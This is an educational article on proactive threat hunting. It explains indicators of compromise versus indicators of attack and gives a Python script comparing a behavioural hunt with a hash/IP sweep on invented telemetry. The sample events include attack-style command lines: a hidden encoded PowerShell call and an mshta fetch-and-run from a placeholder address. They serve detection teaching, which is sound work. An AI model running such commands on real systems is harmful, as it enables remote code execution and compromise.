Recent trends show that many adversaries remain hidden inside an organization for a month before they are detected. Detecting and identifying such attacks has proved too challenging for many organizations, so it has become essential to have a clear understanding of recent and current attack trends.
Cyber threat hunting is the process of proactively looking for malicious or suspicious activity by investigating our own systems and organization to find advanced threats or attack patterns, using a variety of tools and techniques.
Threat hunting is generally described as hypothesis-based investigation: the hunter forms a hypothesis about how an adversary might be operating and then searches the environment for the corresponding evidence, such as indicators of compromise (IOCs), indicators of attack (IOAs), and hashes of malicious executables.
IOC Vs IOA
IOC: Indicator of Compromise
Serves as evidence of a potential intrusion on a host (for example a file hash, an IP address or a domain that was observed in a known attack)
IOA: Indicator of Attack
Identifies the adversary's end goal and the techniques used to reach it, independent of the specific tool or file involved (for example an Office application spawning a command interpreter)
Given recent attack vectors, an organization cannot rely on the SOC team waiting for an alert or notification that something has happened; it needs proactive detection to mitigate the risk before the damage is done. Threat hunting therefore continually creates new hypotheses and investigates them to uncover multiple attack patterns.
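As an added example (not code from the original page), the following Python script runs one hypothesis-driven hunt over constructed process-creation telemetry and compares it with a static IOC sweep. The hypothesis is "an Office application spawned a script or command interpreter", which is a behaviour (IOA) rather than a file hash. The hash values, IP addresses (from the TEST-NET-3 range) and host names are hypothetical, constructed only for this illustration, and the IOC list stands in for a real threat-intelligence feed.

```python
"""Hypothesis-driven threat hunt over constructed process-creation events.

Hypothesis under test: "an Office application spawned a script or command
interpreter" (an IOA: the technique itself, not a file hash). The same
events are also swept against a static IOC list so the two approaches can
be compared side by side.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent: str                    # parent image name, lower-case
    image: str                     # spawned image name, lower-case
    cmdline: str
    sha256: str                    # hash of the spawned payload
    dest_ip: Optional[str] = None  # first outbound connection, if any


# --- Constructed IOC feed: hypothetical values, not real threat intel -------
IOC_HASHES = {"a" * 64}        # payload hash from an earlier (hypothetical) incident
IOC_IPS = {"203.0.113.10"}     # C2 address from the same incident

# --- Behavioural rule (IOA): Office app -> interpreter ----------------------
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# --- Constructed sample telemetry (four hypothetical hosts) -----------------
EVENTS = [
    # ws-01: the known payload and C2 -> caught by both IOC and IOA
    ProcessEvent("ws-01", "winword.exe", "powershell.exe",
                 "powershell -nop -w hidden -enc SQBFAFgA", "a" * 64, "203.0.113.10"),
    # ws-02: same technique, but the attacker rebuilt the payload and moved C2
    ProcessEvent("ws-02", "excel.exe", "cmd.exe",
                 "cmd /c mshta http://203.0.113.25/x.hta", "b" * 64, "203.0.113.25"),
    # ws-03: an admin running PowerShell from Explorer -> benign, no match
    ProcessEvent("ws-03", "explorer.exe", "powershell.exe",
                 "powershell Get-Service", "c" * 64, None),
    # ws-04: Outlook spawning wscript -> IOA only
    ProcessEvent("ws-04", "outlook.exe", "wscript.exe",
                 "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\inv.js", "d" * 64, None),
]


def ioc_matches(events):
    """Static sweep: hosts whose payload hash or destination IP is on the IOC list."""
    return {e.host for e in events if e.sha256 in IOC_HASHES or e.dest_ip in IOC_IPS}


def ioa_matches(events):
    """Behavioural rule: hosts where an Office app spawned an interpreter."""
    return {e.host for e in events if e.parent in OFFICE_APPS and e.image in INTERPRETERS}


def hunt(events):
    """Run both checks and report where they agree and where only one fires."""
    ioc = ioc_matches(events)
    ioa = ioa_matches(events)
    return {"ioc": ioc, "ioa": ioa, "ioa_only": ioa - ioc, "ioc_only": ioc - ioa}


if __name__ == "__main__":
    result = hunt(EVENTS)
    print("IOC hits      :", sorted(result["ioc"]))
    print("IOA hits      :", sorted(result["ioa"]))
    print("IOA-only hits :", sorted(result["ioa_only"]))
```

The IOC sweep finds only ws-01, because it depends on the attacker reusing the exact hash and address from the earlier incident. The behavioural hypothesis also surfaces ws-02 and ws-04, where the payload and infrastructure changed but the technique did not, and it ignores the benign PowerShell session on ws-03. That gap between the two result sets is the practical reason a hunt is framed around an IOA.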
Benefits of Threat Hunting
Reduces cyber risk
Proactively detects and responds to adversary attacks
Behavior-based detection rather than reliance on known signatures
Reduces investigation time
Reduces false positives